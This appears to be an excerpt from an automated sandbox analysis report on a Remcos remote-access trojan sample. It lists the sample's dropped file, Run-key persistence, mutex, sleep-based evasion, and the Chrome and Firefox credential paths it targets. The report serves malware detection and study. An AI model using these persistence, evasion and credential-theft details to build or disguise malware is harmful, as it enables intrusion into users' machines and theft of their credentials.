                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PSG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: Administrator3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: User3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: del3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: del3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: del3_2_0040E9C5
                      Source: 1m70ggeepT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 1m70ggeepT.exeVirustotal: Detection: 79%
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeFile read: C:\Users\user\Desktop\1m70ggeepT.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\1m70ggeepT.exe "C:\Users\user\Desktop\1m70ggeepT.exe"
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 1m70ggeepT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 1m70ggeepT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00457106 push ecx; ret 0_2_00457119
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00457A28 push eax; ret 0_2_00457A46
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00434E56 push ecx; ret 0_2_00434E69
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00457106 push ecx; ret 3_2_00457119
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00457A28 push eax; ret 3_2_00457A46
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00434E56 push ecx; ret 3_2_00434E69
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW,0_2_00406EB0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeFile created: C:\Users\user\AppData\Roaming\microsofts\svcs.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates autostart registry keys with suspicious names
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040F7A7 Sleep,ExitProcess,0_2_0040F7A7
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040F7A7 Sleep,ExitProcess,3_2_0040F7A7
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A748
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_0041A748
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeWindow / User API: threadDelayed 9426Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeWindow / User API: foregroundWindowGot 1754Jump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeEvaded block: after key decisiongraph_0-47584
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeEvaded block: after key decisiongraph_0-47556
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeAPI coverage: 6.4 %
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeAPI coverage: 6.0 %
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6972Thread sleep count: 167 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6972Thread sleep time: -83500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760Thread sleep count: 175 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760Thread sleep time: -525000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760Thread sleep count: 9426 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe TID: 6760Thread sleep time: -28278000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0044E879 FindFirstFileExA,3_2_0044E879
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h]0_2_004432B5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004432B5 mov eax, dword ptr fs:[00000030h]3_2_004432B5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00412077 GetProcessHeap,HeapFree,0_2_00412077
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004349F9
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00434B47 SetUnhandledExceptionFilter,0_2_00434B47
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB22
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434FDC
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004349F9
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00434B47 SetUnhandledExceptionFilter,3_2_00434B47
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB22
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00434FDC
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_004120F7
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_004120F7
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00419627 mouse_event,0_2_00419627
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeProcess created: C:\Users\user\AppData\Roaming\microsofts\svcs.exe "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" Jump to behavior
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS0\
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS0\caw
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneta
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS0\a~
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS0\
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd996caL
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS0\E
                      Source: svcs.exe, 00000001.00000002.4435084421.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00434C52 cpuid 0_2_00434C52
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: EnumSystemLocalesW,0_2_00452036
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004520C3
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoW,0_2_00452313
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: EnumSystemLocalesW,0_2_00448404
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0045243C
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoW,0_2_00452543
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452610
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoA,0_2_0040F8D1
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: GetLocaleInfoW,0_2_004488ED
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451CD8
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: EnumSystemLocalesW,0_2_00451F50
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: EnumSystemLocalesW,0_2_00451F9B
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: EnumSystemLocalesW,3_2_00452036
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_004520C3
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoW,3_2_00452313
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: EnumSystemLocalesW,3_2_00448404
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0045243C
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoW,3_2_00452543
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452610
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoA,3_2_0040F8D1
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: GetLocaleInfoW,3_2_004488ED
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451CD8
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: EnumSystemLocalesW,3_2_00451F50
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: EnumSystemLocalesW,3_2_00451F9B
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040B164 GetLocalTime,wsprintfW,0_2_0040B164
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041B60D GetComputerNameExW,GetUserNameW,0_2_0041B60D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449190

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA12
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040BA12
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB30
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: \key3.db0_2_0040BB30
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040BB30
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: \key3.db3_2_0040BB30

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0Jump to behavior
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
